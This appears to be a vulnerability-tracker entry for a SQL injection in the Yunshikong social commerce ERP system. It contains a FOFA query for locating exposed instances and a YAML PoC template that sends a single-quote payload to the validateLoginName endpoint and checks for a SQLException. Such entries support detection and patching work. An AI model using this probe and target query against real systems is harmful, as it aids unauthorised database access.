yunshikong-erp-sql-injection: 云时空 社会化商业ERP系统存在SQL注入漏洞

2025-08-01 云时空 社会化商业ERP系统 PoC Public

Description

云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息

FOFA: title="云时空社会化商业ERP"

PoC

id: yunshikong-erp-sql-injection

info:
  name: 云时空 社会化商业ERP系统存在SQL注入漏洞
  author: laohuan12138
  severity: high
  verified: true
  description: |
    云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
    FOFA: title="云时空社会化商业ERP"
  reference:
    - https://wiki.peiqi.tech/wiki/webapp/云时空ERP/云时空%20社会化商业ERP系统%20validateLoginName%20SQL注入漏洞.html

rules:
  r0:
    request:
      method: GET
      path: /sys/user/validateLoginName?loginName=admin'
    expression: response.status == 500 && response.body.bcontains(b"SQLException")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities